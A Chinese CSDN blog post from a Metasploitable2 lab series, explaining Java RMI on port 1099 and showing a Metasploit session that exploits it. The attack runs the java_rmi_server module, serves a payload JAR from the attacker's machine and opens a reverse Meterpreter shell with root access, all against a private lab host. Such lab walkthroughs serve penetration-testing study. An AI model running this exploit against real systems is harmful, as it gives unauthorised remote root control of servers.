Metasploit2 - tcp port 1099 - RMI

最新推荐文章于 2022-11-30 09:42:48 发布
最新推荐文章于 2022-11-30 09:42:48 发布
阅读量923 收藏
点赞数
分类专栏: Pentesting Metasploitable2 Metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nixawk/article/details/38324373
版权


Java 远程方法调用(Remote Method Invocation, RMI)使得运行在一个 Java 虚拟机(Java Virtual Machine, JVM)的对象可以调用运行另一个 JVM 之上的其他对象的方法,从而提供了程序间进行远程通讯的途径。RMI 是 J2EE 的很多分布式技术的基础。推荐阅读: http://www.blogjava.net/boddi/archive/2006/10/11/74430.html


msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > set RHOST 192.168.1.111
RHOST => 192.168.1.111
msf exploit(java_rmi_server) > run

[*] Started reverse handler on 192.168.1.113:4444
[*] Using URL: http://0.0.0.0:8080/4jEsxjhipfG1l
[*]  Local IP: http://192.168.1.113:8080/4jEsxjhipfG1l
[*] Connected and sending request for http://192.168.1.113:8080/4jEsxjhipfG1l/qxN.jar
[*] 192.168.1.111    java_rmi_server - Replied to request for payload JAR
[*] Sending stage (30355 bytes) to 192.168.1.111
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.111:50694) at 2014-07-31 22:06:28 -0400
[+] Target 192.168.1.111:1099 may be exploitable...
[*] Server stopped.

meterpreter > getuid
Server username: root

Nixawk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2-Metasploit基础
Cherryuuuu
01-27 1080
Metasploit 渗透测试 exploit payload shellcode
Metasploit渗透测试学习笔记——2、Metasploit基础
Fly_鹏程万里
05-16 1125
前言很多人第一次接触Metasploit渗透测试框架的时候,都会被它所提供如此多的接口、选项、变量、模块所震撼,而感觉无从下手,这一小节将会对这部分内容做一个简单的普及说明,希望对大家有帮助专业术语Exploit(渗透攻击):渗透攻击是指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。攻击者使用渗透攻击去入侵系统时,往往会造成开发者所没有预想到的一中特殊结果。流行的渗透...
Java RMI 远程代码执行漏洞
LuckySec
11-30 3362
Java RMI服务是远程方法调用,是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程Java对象,可以从另一个Java虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,使分布在不同的JVM中的对象的外表和行为都像本地对象一样。在RMI的通信过程中,默认使用序列化来完成所有的交互,如果该服务器Java RMI端口(默认端口1099)对公网开放,且使用了存在漏洞的Apache Commo
intellij idea 启动tomcat 1099端口被占用
点滴记录,积流成河!
08-02 7万+
问题:当使用idea进行开发,关闭tomcat,然后重启tomcat,报如下错误:错误: 代理抛出异常错误: java.rmi.server.ExportException: Port already in use: 1099; nested exception is: java.net.BindException: Address already in use: JVM_Bind这里提示是109...
java RMI相关反序列化漏洞整合分析
weixin_34367845的博客
03-08 1115
angelwhu · 2016/02/26 10:43Author:angelwhu0x00 背景在阐述java反序列化漏洞时,原文中提到:Java LOVES sending serialized objects all over the place. For example:In HTTP requests – Parameters, ViewState, Cookies, you name ...
metasploit--exploit模块信息
weixin_30808253的博客
12-21 1600
Name Disclosure Date Rank Description ---- --------------- ---- ----------- aix/rpc_cmsd_opcode2...
metasploit - exploits
Nixawk
04-20 4万+
msf >use exploits/ use exploit/aix/rpc_cmsd_opcode21 use exploit/aix/rpc_ttdbserverd_realpath use exploit/android/browser/samsung_knox_smdm_url use exploit/android/browser/webview_addjavascriptinterfac
metasploitframework-latest.msi
09-17
metasploitframework-latest.msi
metasploitframework-win-x64
10-05
Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。 使用...
metasploitframework-latest.pkg
09-17
metasploitframework-latest.pkg
metasploitframework-6.3.54.pkg
最新发布
01-27
metasploitframework-6.3.54.pkg
metasploitframework-6.3.54.msi
01-27
metasploitframework-6.3.54.msi
Metasploit - auxiliary/gather/zoomeye_search
热门推荐
Nixawk
10-19 51万+
How to use ZoomEye API ?If you are a python developer, please view ZoomEye-SDK. If not, ZoomEye API Documentation is good for you.$ sudo easy_install zoomeye-SDKor$ sudo pip install git+https://github.
Metasploit2: tcp port 111 – rpcbind
Nixawk
07-29 8478
Metasploit2: tcpport 111 – rpcbind RPC& portmapper (111 TCP + other UDP) portmapper服务是这样工作的:当我连接portmapper端口时,表明我想使用一个指定的RPC服务。portmapper会告诉我该使用哪个端口.(RPC是RemoteProcedure Call的简称,类似与执行远程主机上
NTP - UDP 123
Nixawk
09-03 7992
推荐链接: NTP reflection attack
MSF - searchengine_subdomains_collector
Nixawk
02-19 7152
Collect subdomains from Yahoo / Bing Search Engine.domain:demo.com ip:xxx.xxx.xxx.xxxFor Example, we can gather subdomains of 360.cn.msf auxiliary(searchengine_subdomains_collector) > show options Mod
Linux - Install metasploit on CentOS
Nixawk
03-29 6166
For a security research, we need to put metasploit-framework on the remote machine. OS Details:[centos@localhost centos]$ uname -a Linux localhost.localdomain 2.6.32-042stab104.1 #1 SMP Thu Jan 29 12:
metasploit - auxiliary
Nixawk
04-20 5981
msf >use auxiliarys/ use auxiliary/admin/android/google_play_store_uxss_xframe_rce use auxiliary/admin/appletv/appletv_display_image use auxiliary/admin/appletv/appletv_display_video use auxiliary/admi
metasploitframework-latest
07-13
Metasploit Framework 是一个开源的渗透测试工具,它提供了一系列的漏洞利用模块、Payload生成器和其他辅助工具,帮助安全专业人员评估系统和网络的安全性。 要获取最新版本的 Metasploit Framework,你可以按照以下步骤进行操作: 1. 首先,确保你的系统已经安装了 Ruby 和 Git。如果还没有安装,你可以根据你的操作系统下载并安装它们。 2. 打开终端或命令提示符,并切换到你希望存放 Metasploit Framework 的目录。 3. 使用以下命令克隆 Metasploit Framework 的 Git 仓库: ``` git clone https://github.com/rapid7/metasploit-framework.git ``` 4. 切换到克隆下来的 metasploit-framework 目录: ``` cd metasploit-framework ``` 5. 安装依赖项。在终端中运行以下命令: ``` bundle install ``` 6. 安装完成后,你可以通过以下命令启动 Metasploit Framework: ``` ./msfconsole ``` 这将启动 Metasploit Framework 的控制台界面,你可以使用各种模块和工具来进行渗透测试。 请注意,Metasploit Framework 是一个强大的工具,需要遵循法律和伦理规范使用。在使用之前,请确保你已经获得了相关的授权和权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值